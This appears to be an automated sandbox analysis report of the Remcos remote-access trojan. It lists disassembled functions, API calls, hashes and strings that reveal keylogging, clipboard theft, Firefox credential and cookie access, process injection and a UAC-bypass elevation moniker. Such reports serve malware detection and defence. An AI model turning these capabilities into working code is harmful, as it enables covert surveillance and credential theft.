                                                                                • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                • API String ID: 3815868655-81343324
                                                                                • Opcode ID: 50b1d0fc91afe526fa1309d4a82df5ba01fe55afecd06ede1f11c4e8f9f9fb88
                                                                                • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                • Opcode Fuzzy Hash: 50b1d0fc91afe526fa1309d4a82df5ba01fe55afecd06ede1f11c4e8f9f9fb88
                                                                                • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                • API String ID: 65172268-860466531
                                                                                • Opcode ID: cfb04ba1926760254cd88be8b48c9f6bb6ad45a9b1fd41f21a489f834e60e5d2
                                                                                • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                • Opcode Fuzzy Hash: cfb04ba1926760254cd88be8b48c9f6bb6ad45a9b1fd41f21a489f834e60e5d2
                                                                                • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                • API String ID: 1164774033-3681987949
                                                                                • Opcode ID: eea8fc23c147da3b60f56dcc74469d0638dedfb01c8569cb4c4dab3f4e54c3b7
                                                                                • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                • Opcode Fuzzy Hash: eea8fc23c147da3b60f56dcc74469d0638dedfb01c8569cb4c4dab3f4e54c3b7
                                                                                • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Find$Close$File$FirstNext
                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 3527384056-432212279
                                                                                • Opcode ID: ec68f83b2f7c6d439a506c8b4972814c1148e38401375b42d039e8e6b8023f69
                                                                                • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                • Opcode Fuzzy Hash: ec68f83b2f7c6d439a506c8b4972814c1148e38401375b42d039e8e6b8023f69
                                                                                • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                • API String ID: 726551946-3025026198
                                                                                • Opcode ID: 1202f06a0d6a6bd6507acd6e290c2798131bbc521a3cad66b5f78fa406b98fca
                                                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                • Opcode Fuzzy Hash: 1202f06a0d6a6bd6507acd6e290c2798131bbc521a3cad66b5f78fa406b98fca
                                                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32 ref: 004159C7
                                                                                • EmptyClipboard.USER32 ref: 004159D5
                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                • String ID:
                                                                                • API String ID: 3520204547-0
                                                                                • Opcode ID: 2691f969ec90e64eb384eebc667e04d8ab46427997284debd9ba0406a325024a
                                                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                • Opcode Fuzzy Hash: 2691f969ec90e64eb384eebc667e04d8ab46427997284debd9ba0406a325024a
                                                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                Function 0079CD05 Relevance: 18.1, APIs: 12, Instructions: 73windownativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0079CD50
                                                                                • GetCursorPos.USER32(?), ref: 0079CD5F
                                                                                • SetForegroundWindow.USER32(?), ref: 0079CD68
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0079CD82
                                                                                • Shell_NotifyIcon.SHELL32(00000002,00473B50), ref: 0079CDD3
                                                                                • ExitProcess.KERNEL32 ref: 0079CDDB
                                                                                • CreatePopupMenu.USER32 ref: 0079CDE1
                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,0046C11C), ref: 0079CDF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                                                • String ID:
                                                                                • API String ID: 1665278180-0
                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction ID: 69346591a74172046489891449d75fc3e5e4c49af905ed4fdf397af1de7921f3
                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction Fuzzy Hash: D521EA31214206FFDF165F64FD0EAAA3F79EB04342F144534BA06A50B2D7B9DA60EB18
                                                                                Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                • API String ID: 0-3177665633
                                                                                • Opcode ID: ab8cead1c51aeb0d65c1fa63b0ea02fb3941cc31de3c7ee09e1b7f2f3e179eb6
                                                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                • Opcode Fuzzy Hash: ab8cead1c51aeb0d65c1fa63b0ea02fb3941cc31de3c7ee09e1b7f2f3e179eb6
                                                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                • String ID: 8[G
                                                                                • API String ID: 1888522110-1691237782
                                                                                • Opcode ID: bdba82efd78dbfa46e06de91f6c115a05439826f479e25c853a32ad94c4ee5f3
                                                                                • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                • Opcode Fuzzy Hash: bdba82efd78dbfa46e06de91f6c115a05439826f479e25c853a32ad94c4ee5f3
                                                                                • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00406788
                                                                                • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object_wcslen
                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                • API String ID: 240030777-3166923314
                                                                                • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                • GetLastError.KERNEL32 ref: 00419935
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 3587775597-0
                                                                                • Opcode ID: 88145660ca74307e410d2ff44a9f08576091a861de2da63eb11456bd5a492770
                                                                                • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                • Opcode Fuzzy Hash: 88145660ca74307e410d2ff44a9f08576091a861de2da63eb11456bd5a492770
                                                                                • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                Function 00799B29 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 00799B3F
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00799B8E
                                                                                • GetLastError.KERNEL32 ref: 00799B9C
                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00799BD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                • String ID:
                                                                                • API String ID: 3587775597-0
                                                                                • Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                • Instruction ID: 415c0b2071191571d804af2e0e9c5688433af93a0a054071e8813174b9940573
                                                                                • Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
                                                                                • Instruction Fuzzy Hash: 32814D71148344EFC714FB20D89AEAFB7A8FF94705F50482DF59242192EF78AA05CB96
                                                                                Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                • String ID:
                                                                                • API String ID: 2341273852-0
                                                                                • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                Function 0079B696 Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0079B6F0
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0079B722
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0079B790
                                                                                • DeleteFileW.KERNEL32(?), ref: 0079B79D
                                                                                  • Part of subcall function 0079B696: RemoveDirectoryW.KERNEL32(?), ref: 0079B773
                                                                                • FindClose.KERNEL32(00000000), ref: 0079B7C8
                                                                                • RemoveDirectoryW.KERNEL32(00000000), ref: 0079B7CF
                                                                                • GetLastError.KERNEL32 ref: 0079B7D7
                                                                                • FindClose.KERNEL32(00000000), ref: 0079B7EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                • String ID:
                                                                                • API String ID: 2341273852-0
                                                                                • Opcode ID: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
                                                                                • Instruction ID: 19a51ddac14e0a3785d2e19ea52707ca735f7ab5d64e8ea4d9e00f23d3603933
                                                                                • Opcode Fuzzy Hash: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
                                                                                • Instruction Fuzzy Hash: EC315D7280421CAACF20DBB0BD8DFEA77BCAF54305F4405E6F505D2152EB799A94CB24
                                                                                Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Find$CreateFirstNext
                                                                                • String ID: @CG$XCG$`HG$`HG$>G
                                                                                • API String ID: 341183262-3780268858
                                                                                • Opcode ID: 0d4f8f48bab971d830881b23cb96bff5e3585e6dba69a526643eea9029af7dee
                                                                                • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                • Opcode Fuzzy Hash: 0d4f8f48bab971d830881b23cb96bff5e3585e6dba69a526643eea9029af7dee
                                                                                • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                Strings
                                                                                • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                • String ID: Keylogger initialization failure: error
                                                                                • API String ID: 3219506041-952744263
                                                                                • Opcode ID: 364e96b5da3c2ae6c0a7f5944a03433e7780bf7fb98c81f4d9b6630f129a3310
                                                                                • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                • Opcode Fuzzy Hash: 364e96b5da3c2ae6c0a7f5944a03433e7780bf7fb98c81f4d9b6630f129a3310
                                                                                • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                Function 0078B59C Relevance: 12.1, APIs: 8, Instructions: 145fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00465F1C), ref: 0078B61B
                                                                                • FindClose.KERNEL32(00000000), ref: 0078B635
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0078B758
